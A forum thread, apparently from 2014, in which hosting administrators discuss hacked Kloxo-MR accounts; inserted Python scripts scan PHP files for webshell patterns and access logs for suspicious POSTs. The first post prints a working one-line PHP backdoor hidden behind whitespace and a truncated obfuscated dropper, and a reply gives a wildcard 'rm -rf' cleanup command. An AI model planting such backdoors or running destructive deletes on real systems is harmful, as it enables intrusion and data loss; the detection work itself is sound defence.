
Author Topic: [CRITICAL] Many Kloxo-MR accounts hacked !!!  (Read 7110 times)


Spacedust
[CRITICAL] Many Kloxo-MR accounts hacked !!!
« on: 2014-11-07, 17:15:38 »
We've got some customers whose accounts are hacked (not via FTP, but via web, through many different scripts).

There are additional files like files.php or options.php with content like:

Quote
<?php                                                                                                                                                                                                                                                               eval(base64_decode($_POST['n6ae4d5']));?>

or

Quote
<?php $r76="F[<PAlDf|]}M@~79/O8Kx\rH6r&-c5k\n3X,YzhQ> Cp\\wUu2jGoB;0i_SN\tn%Vg)ZI^sTRyvL{\$:=1*mE+JW(q4.t'`a!\"#edb?"; $GLOBALS['vtton6'] = $r76[94].$r76[24].$r76[24].$r76[49].$r76[24].$r76[54].$r76[24].$r76[94].$r76[41].$r76[49].$r76[24].$r76[87].$r76[53].$r76[58].$r76[61]; $GLOBALS['jlxru64'] = $r76[53].$r76[58].$r76[53].$r76[54].$r76[66].$r76[94].$r76[87]; $GLOBALS['vajox38'] = $r76[95].$r76[94].$r76[7].$r76[53].$r76[58].$r76[94]; $GLOBALS['qobdl72'] = $r76[36].$r76[70].$r76[27].$r76[45].$r76[61].$r76[76].$r76[31]; $GLOBALS['yhrfr40'] = $r76[20].$r76[69].$r76[36].$r76[20].$r76[58].$r76[15].$r76[46]; $GLOBALS['quzii24'] = $r76[78].$r76[95].$r76[28]; $GLOBALS['tlyiy12'] = $r76[27].$r76[49].$r76[45].$r76[58].$r76[87]; $GLOBALS['kyioa8'] = $r76[87].$r76[53].$r76[78].$r76[94]; $GLOBALS['glyac65'] = $r76[27].$r76[49].$r76[58].$r76[66].$r76[87].$r76[90].$r76[58].$r76[87]; $GLOBALS['nhnww15'] = $r76[58].$r76[41].$r76[45].$r76[7].$r76[53].$r76[23].$r76[76]; $GLOBALS['igajs32'] = $r76[41].$r76[49].$r76[87].$r76[27].$r76[27].$r76[76].$r76[76]; $GLOBALS['cpukq94'] = $r76[49].$r76[78].$r76[90].$r76[45].$r76[7].$r76[18].$r76[14]; $GLOBALS['bdonk12'] = $r76[36].$r76[43].$r76[61].$r76[96].$r76[49].$r76[18].$r76[18]; $GLOBALS['aurku4'] = $r76[53].$r76[49].$r76[20].$r76[61].$r76[49].$r76[46].$r76[15]; $GLOBALS['yqqkt30'] = $r76[7].$r76[45].$r76[58].$r76[27].$r76[87].$r76[53].$r76[49].$r76[58].$r76[54].$r76[94].$r76[20].$r76[53].$r76[66].$r76[87].$r76[66]; $GLOBALS['tnmsd36'] = $r76[78].$r76[90].$r76[53].$r76[5]; $GLOBALS['chqql44'] = $r76[90].$r76[24].$r76[78].$r76[87].$r76[20].$r76[31].$r76[46]; $GLOBALS['cvtxr40'] = $r76[94].$r76[27].$r76[69].$r76[43].$r76[66].$r76[31].$r76[52]; $GLOBALS['eavur97'] = $r76[45].$r76[66].$r76[5].$r76[94].$r76[94].$r76[41]; $GLOBALS['ptlaz26'] = $r76[45].$r76[24].$r76[70].$r76[7].$r76[45].$r76[14].$r76[18]; $GLOBALS['xcnkh30'] = $r76[20].$r76[5].$r76[5].$r76[94].$r76[35].$r76[52]; $GLOBALS['wnlxd28'] = $r76[87].$r76[24].$r76[53].$r76[78]; 
$GLOBALS['laepm94'] = $r76[41].$r76[24].$r76[94].$r76[61].$r76[54].$r76[24].$r76[94].$r76[41].$r76[5].$r76[90].$r76[27].$r76[94]; $GLOBALS['nxseo15'] = $r76[61].$r76[94].$r76[87].$r76[36].$r76[49].$r76[66].$r76[87].$r76[96].$r76[69].$r76[58].$r76[90].$r76[78].$r76[94]; $GLOBALS['cyzbs96'] = $r76[41].$r76[24].$r76[94].$r76[61].$r76[54].$r76[78].$r76[90].$r76[87].$r76[27].$r76[36]; $GLOBALS['yoejz48'] = $r76[24].$r76[35].$r76[94].$r76[29].$r76[61].$r76[31].$r76[15]; $GLOBALS['lzjpr73'] = $r76[43].$r76[95].$r76[87].$r76[47].$r76[7].$r76[23].$r76[18]; $GLOBALS['osnjl91'] = $r76[24].$r76[20].$r76[24].$r76[78].$r76[41].$r76[14].$r76[52]; $GLOBALS['zhjzv93'] = $r76[41].$r76[24].$r76[27].$r76[45].$r76[20].$r76[85].$r76[14]; $GLOBALS['brkww19'] = $r76[66].$r76[87].$r76[24].$r76[5].$r76[94].$r76[58]; $GLOBALS['yhcum29'] = $r76[49].$r76[69].$r76[69].$r76[66].$r76[61].$r76[18].$r76[52]; $GLOBALS['ibere91'] = $r76[7].$r76[49].$r76[7].$r76[87].$r76[61].$r76[46].$r76[14]; $GLOBALS['vszxc90'] = $r76[90].$r76[24].$r76[24].$r76[90].$r76[69].$r76[54].$r76[29].$r76[94].$r76[69].$r76[66]; $GLOBALS['qtgcq90'] = $r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[66].$r76[94].$r76[5].$r76[94].$r76[27].$r76[87]; $GLOBALS['bwpvf88'] = $r76[45].$r76[27].$r76[7].$r76[53].$r76[24].$r76[66].$r76[87]; $GLOBALS['bdvxl14'] = $r76[66].$r76[87].$r76[24].$r76[54].$r76[24].$r76[94].$r76[41].$r76[5].$r76[90].$r76[27].$r76[94]; $GLOBALS['xizmx47'] = $r76[53].$r76[58].$r76[53].$r76[54].$r76[61].$r76[94].$r76[87]; $GLOBALS['stkuy98'] = $r76[70].$r76[29].$r76[90].$r76[84].$r76[84].$r76[15].$r76[18]; $GLOBALS['duiid33'] = $r76[95].$r76[90].$r76[87].$r76[94]; $GLOBALS['grxdw62'] = $r76[61].$r76[94].$r76[87].$r76[78].$r76[20].$r76[24].$r76[24]; $GLOBALS['nvuxa92'] = $r76[69].$r76[96].$r76[94].$r76[43].$r76[69].$r76[18].$r76[18]; $GLOBALS['ysmvf63'] = $r76[78].$r76[53].$r76[58]; $GLOBALS['vbhwy58'] = ${$r76[54].$r76[3].$r76[17].$r76[55].$r76[67]}; $GLOBALS['wdbfr89'] = 
$r76[7].$r76[94].$r76[43].$r76[7].$r76[20].$r76[85].$r76[52]; $GLOBALS['vxogc32'] = $r76[41].$r76[24].$r76[94].$r76[61].$r76[54].$r76[66].$r76[41].$r76[5].$r76[53].$r76[87]; $GLOBALS['inenw32'] = $r76[20].$r76[43].$r76[66].$r76[94].$r76[66].$r76[46].$r76[85]; $GLOBALS['xyxdn38'] = $r76[27].$r76[36].$r76[24]; $GLOBALS['rtdlc97'] = $r76[49].$r76[24].$r76[95]; $GLOBALS['cnrfe78'] = $r76[45].$r76[24].$r76[5].$r76[95].$r76[94].$r76[27].$r76[49].$r76[95].$r76[94]; $GLOBALS['wzekj92'] = $r76[66].$r76[87].$r76[24].$r76[53].$r76[41].$r76[66].$r76[5].$r76[90].$r76[66].$r76[36].$r76[94].$r76[66]; $GLOBALS['yrqxp89'] = $r76[90].$r76[24].$r76[24].$r76[90].$r76[69].$r76[54].$r76[7].$r76[5].$r76[53].$r76[41]; $GLOBALS['xavtv19'] = $r76[41].$r76[24].$r76[94].$r76[61].$r76[54].$r76[78].$r76[90].$r76[87].$r76[27].$r76[36].$r76[54].$r76[90].$r76[5].$r76[5]; $GLOBALS['zjheh80'] = $r76[96].$r76[90].$r76[66].$r76[94].$r76[23].$r76[85].$r76[54].$r76[94].$r76[58].$r76[27].$r76[49].$r76[95].$r76[94]; $GLOBALS['gisxn89'] = $r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[27].$r76[24].$r76[94].$r76[90].$r76[87].$r76[94]; $GLOBALS['oqikt29'] = $r76[66].$r76[49].$r76[27].$r76[29].$r76[94].$r76[87].$r76[54].$r76[5].$r76[90].$r76[66].$r76[87].$r76[54].$r76[94].$r76[24].$r76[24].$

Then these files are executed remotely from different IPs:

Quote
37.139.47.122 - - [03/Nov/2014:05:15:09 +0100] "POST /reklamy/lib/max/Maintenance/Forecasting/info.php HTTP/1.0" 200 10804 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0"
85.143.166.99 - - [03/Nov/2014:08:32:48 +0100] "POST /reklamy/lib/max/Maintenance/Forecasting/info.php HTTP/1.0" 200 10828 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0"
37.139.47.122 - - [03/Nov/2014:11:56:25 +0100] "POST /reklamy/lib/max/Maintenance/Forecasting/info.php HTTP/1.0" 200 10960 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0"
62.76.178.9 - - [03/Nov/2014:17:00:18 +0100] "POST /reklamy/lib/max/Maintenance/Forecasting/info.php HTTP/1.0" 200 12317 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0"

Then our mail queue is full of messages like this (we use a limit of 100 per hour, but it's annoying as hell, as our mail server's IP is added to DNS blocklists):

Quote
--------------
MESSAGE NUMBER 793825
 --------------
Received: (qmail 3373 invoked by uid 2513); 7 Nov 2014 11:08:54 -0000
Date: 7 Nov 2014 11:08:54 -0000
Message-ID: <20141107110854.3372.qmail@mail.xxx.pl>
To: rvkadam1980@gimail.com
Subject: Fw:  LOL =) [ShiM] - Amateur russian mom fuck with teen - www.shimeon.altervista.org
From: "Meagan Payne" <meagan_payne@plotki.klik.net.pl>
Reply-To: "Meagan Payne" <meagan_payne@plotki.klik.net.pl>
X-Priority: 3 (Normal)
MIME-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit


<h2><a href="http://BIOSTRUCTURES.NET/wp-content/plugins/categories-images/defines.html?cHRpY2ZjbzM7OjJCZWtvY2tuLGFtbw==">[ShiM] - Amateur russian mom fuck with teen - www.shimeon.altervista.org</a></h2>
<div>the polar cap. How do you know that the artifact was taken that way?"</div>
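
As an added example (not code from this thread or from the Kloxo-MR project), the Python script below implements the two checks a defender would want after reading the post above: it scans PHP source for the webshell shapes quoted there (an eval(base64_decode(...)) fed from a request superglobal, the $r76[N].$r76[M] string-index obfuscation, and a long whitespace run that pushes the payload off-screen), and it parses Apache combined-format access-log lines to group successful, referer-less POSTs to .php files by path and source IP. The PHP samples are constructed; the log lines are the four quoted in the post plus two constructed benign lines; the thresholds (25 indexed-char joins, 40 spaces, 2 distinct IPs) are assumptions to tune on your own hosts.

```python
import re
from collections import defaultdict

# --- 1. Content indicators for the two webshell styles quoted in the thread ---
# eval(base64_decode(<request superglobal>)): the one-line shell
EVAL_INPUT = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I)
# $r76[94].$r76[24]. ... : names assembled from indices into one long string
INDEX_CONCAT = re.compile(r"\$\w+\[\d+\]\s*\.")
# a long run of spaces/tabs right after <?php hides the payload off-screen in editors
HIDDEN_GAP = re.compile(r"<\?php[ \t]{40,}")


def scan_php(source: str, concat_threshold: int = 25) -> list:
    """Return the reasons a PHP source string looks like a dropped webshell (empty if clean)."""
    reasons = []
    if EVAL_INPUT.search(source):
        reasons.append("eval(base64_decode()) on request input")
    joins = len(INDEX_CONCAT.findall(source))
    if joins >= concat_threshold:  # threshold is an assumption; legitimate code rarely does this
        reasons.append(f"string-index obfuscation ({joins} indexed-char joins)")
    if HIDDEN_GAP.search(source):
        reasons.append("long whitespace run after <?php")
    return reasons


# --- 2. Access-log correlation: who is POSTing to which PHP file ---
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')


def suspicious_posts(lines, min_ips: int = 2) -> dict:
    """Map each .php path that received successful, referer-less POSTs from at least
    min_ips distinct addresses to the sorted list of those addresses."""
    hits = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line.rstrip("\n"))
        if not m:
            continue  # not combined format; skip rather than guess
        if (m["method"] == "POST" and m["path"].lower().endswith(".php")
                and m["status"] == "200" and m["referer"] == "-"):
            hits[m["path"]].add(m["ip"])
    return {path: sorted(ips) for path, ips in hits.items() if len(ips) >= min_ips}


# --- Constructed samples ---
SAMPLE_PHP = {
    # same shape as the files.php quoted in the post: 200 spaces, then the eval
    "files.php": "<?php" + " " * 200 + "eval(base64_decode($_POST['n6ae4d5']));?>",
    # same shape as the options.php sample: a name built from 30 indexed characters
    "options.php": '<?php $r76="F[<PAlDf|]}M@~79"; $GLOBALS[\'vtton6\'] = '
                   + ".".join(f"$r76[{i}]" for i in range(30)) + ";",
    "index.php": "<?php echo 'hello'; ?>",
}
SAMPLE_LOG = [  # four lines quoted in the post, plus two constructed benign lines
    '37.139.47.122 - - [03/Nov/2014:05:15:09 +0100] "POST /reklamy/lib/max/Maintenance/Forecasting/info.php HTTP/1.0" 200 10804 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0"',
    '85.143.166.99 - - [03/Nov/2014:08:32:48 +0100] "POST /reklamy/lib/max/Maintenance/Forecasting/info.php HTTP/1.0" 200 10828 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0"',
    '37.139.47.122 - - [03/Nov/2014:11:56:25 +0100] "POST /reklamy/lib/max/Maintenance/Forecasting/info.php HTTP/1.0" 200 10960 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0"',
    '62.76.178.9 - - [03/Nov/2014:17:00:18 +0100] "POST /reklamy/lib/max/Maintenance/Forecasting/info.php HTTP/1.0" 200 12317 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0"',
    '10.0.0.5 - - [03/Nov/2014:09:00:00 +0100] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [03/Nov/2014:09:05:12 +0100] "POST /wp-login.php HTTP/1.1" 302 0 "http://example.test/wp-login.php" "Mozilla/5.0"',
]


def demo() -> dict:
    """Run both checks over the samples; returns {filename: reasons, ..., 'posts': {...}}."""
    report = {name: scan_php(src) for name, src in SAMPLE_PHP.items()}
    report["posts"] = suspicious_posts(SAMPLE_LOG)
    return report


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

On a real host, feed scan_php() every .php file under the document roots and suspicious_posts() the vhost access logs; a path that both checks flag (shell content, plus POSTs from several unrelated IPs with no referer) is the one to pull first, and the request timestamps bound when the file was first used.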


MRatWork
Re: [CRITICAL] Many Kloxo-MR accounts hacked !!!
« Reply #1 on: 2014-11-07, 18:17:43 »
Inform here the directory of file.php.

This issue also happens in cPanel accounts.
..:: MRatWork (Mustafa Ramadhan Projects) ::..
-- Server/Web-integrator - Web Hosting (Kloxo-MR READY!) --

Spacedust
Re: [CRITICAL] Many Kloxo-MR accounts hacked !!!
« Reply #2 on: 2014-11-08, 08:13:58 »
Quote
Inform here the directory of file.php.

This issue also happens in cPanel accounts.

Here you are:

Quote
ls -l /home/httpd/plotki.klik.net.pl/httpdocs/reklamy/lib/max/Maintenance/Forecasting/
total 20K
drwxr-xr-x 3 piotr_k2_2004 piotr_k2_2004 4.0K Dec  3  2012 AdServer
-rw-r--r-- 1 piotr_k2_2004 piotr_k2_2004 4.3K Dec  3  2012 AdServer.php
drwxr-xr-x 2 piotr_k2_2004 piotr_k2_2004 4.0K Dec  3  2012 Channel
-rw-r--r-- 1 piotr_k2_2004 piotr_k2_2004  301 Sep 18 16:31 info.php
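
In the listing above, info.php stands out because its modification time (Sep 18) is far from its siblings' (Dec 2012). As an added example, not from this thread or from Kloxo-MR, the Python below automates that triage: mtime_outliers() flags entries whose mtime is more than a window away from the directory's median mtime, and build_sample_tree() recreates the listing in a temporary directory (names and dates from the post, file contents constructed). The 30-day default window and the minimum of three entries are assumptions.

```python
import os
import statistics
import tempfile
from datetime import datetime, timezone


def mtime_outliers(directory: str, window_seconds: float = 30 * 86400) -> list:
    """Return names of entries whose mtime is further than window_seconds from the
    directory's median mtime. Subdirectories count too: they anchor the baseline
    when the directory holds only one or two regular files."""
    entries = [(e.name, e.stat(follow_symlinks=False).st_mtime)
               for e in os.scandir(directory)]
    if len(entries) < 3:
        return []  # too few entries to call anything an outlier (assumed cut-off)
    baseline = statistics.median(m for _, m in entries)
    return sorted(name for name, m in entries if abs(m - baseline) > window_seconds)


def build_sample_tree() -> str:
    """Constructed replica of the Forecasting/ listing from the thread: three entries
    dated 3 Dec 2012 and one info.php dated 18 Sep 2014 16:31."""
    root = tempfile.mkdtemp(prefix="forecasting-")
    old = datetime(2012, 12, 3, tzinfo=timezone.utc).timestamp()
    new = datetime(2014, 9, 18, 16, 31, tzinfo=timezone.utc).timestamp()
    for name, is_dir, ts in [("AdServer", True, old), ("AdServer.php", False, old),
                             ("Channel", True, old), ("info.php", False, new)]:
        path = os.path.join(root, name)
        if is_dir:
            os.mkdir(path)
        else:
            with open(path, "w") as f:
                f.write("<?php // constructed sample file\n")
        os.utime(path, (ts, ts))  # back-date the entry to the listed timestamp
    return root


if __name__ == "__main__":
    sample = build_sample_tree()
    print("outliers in", sample, "->", mtime_outliers(sample))
```

Walk every directory under the document root with this and you get a short list of files to open first. Treat it as a lead, not a verdict: an mtime is trivially reset with touch, so a clean result proves nothing, and a flagged file still needs its content checked.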

MRatWork
Re: [CRITICAL] Many Kloxo-MR accounts hacked !!!
« Reply #3 on: 2014-11-08, 08:39:05 »
/home/httpd/<domain.com>/httpdocs is just a symlink to /home/<user>/<domain.com>/

This symlink has existed since Kloxo official. I don't know whether it is important or not.

MRatWork
Re: [CRITICAL] Many Kloxo-MR accounts hacked !!!
« Reply #4 on: 2014-11-08, 09:02:42 »
For Kloxo-MR, fortunately, this /home/httpd/<domain.com>/httpdocs is not created. It appears if the domain was created in Kloxo official and still exists after updating to Kloxo-MR.

Remove these old directories with:
Code:
rm -rf /home/httpd/*/httpdocs
rm -rf /home/httpd/*/conf

Spacedust
Re: [CRITICAL] Many Kloxo-MR accounts hacked !!!
« Reply #5 on: 2014-11-08, 10:38:31 »
It does not matter. The problem is how hackers are able to inject the code via web when permissions are fine and FTP wasn't hacked.

MRatWork
Re: [CRITICAL] Many Kloxo-MR accounts hacked !!!
« Reply #6 on: 2014-11-08, 10:53:59 »
A plugin in WordPress.


chrisf
Re: [CRITICAL] Many Kloxo-MR accounts hacked !!!
« Reply #8 on: 2014-11-09, 13:05:51 »
@Spacedust, have you found the method used to inject these files? Were all affected accounts using WordPress?

Please inform here your investigations.  Thank you.
Christopher

Knowledge in: PHP, Perl, MySQL, Javascript, Actionscript, FLASH, HTML, CSS
Server Administrator / Developer: https://convictionshosting.com

Spacedust
Re: [CRITICAL] Many Kloxo-MR accounts hacked !!!
« Reply #9 on: 2014-11-13, 06:03:34 »
Quote
@Spacedust, have you found the method used to inject these files? Were all affected accounts using WordPress?

Please inform here your investigations. Thank you.

No, they were not using WordPress; they were using OpenX.

Spacedust
Re: [CRITICAL] Many Kloxo-MR accounts hacked !!!
« Reply #10 on: 2014-11-13, 06:50:40 »
This is how they upload files !


amudy17
Re: [CRITICAL] Many Kloxo-MR accounts hacked !!!
« Reply #11 on: 2014-12-03, 20:18:18 »
That is a backdoor being called with a c99 shell. I think enabling PHP safe mode would make it more secure.
Free, Fast and Secure CP => Kloxo-MR
Daily News Update => Click here to see website!

 

